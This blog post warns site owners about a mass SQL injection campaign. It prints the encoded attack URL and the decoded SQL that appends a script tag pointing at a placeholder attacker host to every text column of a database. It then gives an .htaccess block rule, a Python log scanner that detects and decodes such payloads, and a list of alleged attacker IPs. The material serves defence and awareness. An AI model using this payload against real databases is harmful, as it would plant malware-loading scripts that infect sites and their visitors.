Watch your back bloggers – A site hacking alert

Since 11 August, I have received an SQL injection attack on my blog on a daily basis (each try is 2 consecutive attempts). Apparently it started on 8 August, and not many bloggers/webmasters have realised this yet. Here is a non-technical summary of what’s going on.

What is it?

It is an SQL injection attack delivered through the URL query string. The attacker requests a URL like the following against your site:

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41---TRUNCATED---43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which is a hex-encoded string that decodes to:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"><script src="HACKERS_ADDRESS/w.js"></script><!--  '' where '+@C+' not like ''%"--><script src="HACKERS_ADDRESS/w.js"></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This script tries to infect the website by running a query that walks every text column of every user table (the sysobjects/syscolumns cursor above) and appends a script tag pointing at a JavaScript file on the attacker’s site. When a browser reaches the infected website, the injected JavaScript is loaded and attempts to download one of the following programs onto the visitor’s computer:

  • rondll32.exe
  • msyahoo.exe
  • wsv.exe
  • thunder.exe

There are no details yet on what these malicious programs do, but they are certainly not something you want. The Internet Storm Center provides comprehensive detail on this activity, and TrustedSource also provides a non-technical description of the attack.

I’m a blogger/webmaster, how can I prevent it?

The script is not CMS-specific, and as long as it has no access to your server the exploit attempt will fail on the spot (the decoded query targets Microsoft SQL Server’s sysobjects and syscolumns tables, so a site that does not pass the query string through to such a database gives it nothing to work with). Thanks to tflight on the WordPress forums, you can add the following rewrite rules to your .htaccess file to filter out attack attempts (just in case):

# Reject (403) any request whose query string contains "declare", case-insensitively
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.+)declare(.+)$ [NC]
RewriteRule ^.* - [F,L]

If you keep logs for your site, now is the time to open them up and check whether you have been targeted. If you own website(s) and do not pay them much attention, now is a good time to rethink that and look after your visitors.
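Checking logs by hand for the hex-encoded wrapper shown above is tedious, so here is an added example (my own code, not part of the original post) that does the three things the post describes: it spots the DECLARE/CAST/EXEC wrapper in access-log lines, decodes the 0x... hex back into the SQL it carries (CHAR casts hold single-byte text, NCHAR/NVARCHAR casts hold UTF-16LE, which the post’s sample does not cover), reports which lines the .htaccess RewriteCond above would have matched, and collects the source IPs. The log lines, the inner SQL and the IP addresses are constructed for the example; the log format assumed is Apache’s "combined" format.

```python
"""Scan web-server access logs for the hex-encoded DECLARE/CAST/EXEC injection
wrapper, decode the hex back into the SQL it carries, and list the source IPs.
All log lines and payload text below are constructed for this example."""
import re
from urllib.parse import unquote

# Apache "combined" log line: client IP, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The wrapper the attacker sends: DECLARE @S ...;SET @S=CAST(0x<hex> AS CHAR(4000));EXEC(@S)
# (NCHAR/NVARCHAR variants carry the same text as UTF-16LE instead of single-byte text).
PAYLOAD_RE = re.compile(
    r"DECLARE\s+@\w+.*?CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<type>N?(?:VAR)?CHAR)\(\d+\)\).*?EXEC\(@\w+\)",
    re.IGNORECASE,
)

# Same pattern as the .htaccess RewriteCond in the post: ^(.+)declare(.+)$ [NC]
HTACCESS_RULE_RE = re.compile(r"^(.+)declare(.+)$", re.IGNORECASE)


def decode_hex_payload(hex_str: str, cast_type: str) -> str:
    """Turn the 0x... literal back into readable SQL. CHAR/VARCHAR casts hold
    single-byte text; NCHAR/NVARCHAR casts hold UTF-16LE."""
    raw = bytes.fromhex(hex_str)
    if cast_type.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def rule_would_block(raw_query_string: str) -> bool:
    """True if the post's RewriteCond would match this query string.
    mod_rewrite tests %{QUERY_STRING} as sent, so the check runs on the raw (undecoded) string."""
    return HTACCESS_RULE_RE.search(raw_query_string) is not None


def find_injection_attempts(log_lines):
    """Return one record per log line whose request carries the injection wrapper."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = m.group("target")
        raw_qs = target.partition("?")[2]
        decoded_target = unquote(target)  # %20 -> space, so the SQL keywords line up
        p = PAYLOAD_RE.search(decoded_target)
        if not p:
            continue
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "status": int(m.group("status")),
            "decoded_sql": decode_hex_payload(p.group("hex"), p.group("type")),
            "blocked_by_rule": rule_would_block(raw_qs),
        })
    return hits


def attacker_ips(hits):
    """Distinct source addresses, sorted, ready for a ban list."""
    return sorted({h["ip"] for h in hits})


# --- constructed sample data --------------------------------------------------
# Inner SQL shaped like the decoded payload in the post (cursor over sysobjects /
# syscolumns); the script tag it would append is deliberately left out of this sample.
SAMPLE_SQL = ("DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
              "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'")
HEX_ASCII = SAMPLE_SQL.encode("ascii").hex().upper()
HEX_UTF16 = SAMPLE_SQL.encode("utf-16-le").hex().upper()

# 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges, not the IPs from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2008:03:14:07 +0000] "GET /index.php?p=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [11/Aug/2008:03:15:22 +0000] "GET /page.asp?id=12;DECLARE%20@S%20CHAR(4000);'
    f'SET%20@S=CAST(0x{HEX_ASCII}%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 500 312 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [11/Aug/2008:03:15:23 +0000] "GET /page.asp?id=12;DECLARE%20@S%20NVARCHAR(4000);'
    f'SET%20@S=CAST(0x{HEX_UTF16}%20AS%20NVARCHAR(4000));EXEC(@S); HTTP/1.1" 500 312 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    found = find_injection_attempts(SAMPLE_LOG)
    for hit in found:
        print(f"{hit['ip']} {hit['timestamp']} status={hit['status']} blocked_by_rule={hit['blocked_by_rule']}")
        print("   decoded:", hit["decoded_sql"][:80], "...")
    print("sources:", attacker_ips(found))
```

To use it on a real server, replace SAMPLE_LOG with the lines of your access log; a hit whose status is 200 rather than an error is the one worth following up, since it means the application accepted the request rather than failing on the stray DECLARE. The decoded SQL tells you which host the injected script tag points at, which is what you need in order to search your database content for it.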

I’m a browser user, how can I prevent it?

The injected JavaScript detects your browser type and either creates an ActiveX object (if you are on IE) or opens a Flash file; both will download the malicious program onto your computer.

If you are using IE 6, for god’s sake, please upgrade to IE 7 or switch to Firefox.
If you are an IE 7 user, make sure your browser settings prevent ActiveX from running automatically on any site, and be suspicious when a random site attempts to run ActiveX.

The best solution I have for Internet browsers is to use Firefox 3 with the NoScript extension.

Here’s a list of the IPs of the foes who have tried to attack my blog (so far):
24.253.101.241
60.221.229.53
61.185.148.148
61.18.170.115
61.18.170.227
82.46.210.74
87.206.38.42
190.40.69.44
218.74.194.61
221.207.153.239
220.163.186.17

Ban them at your will.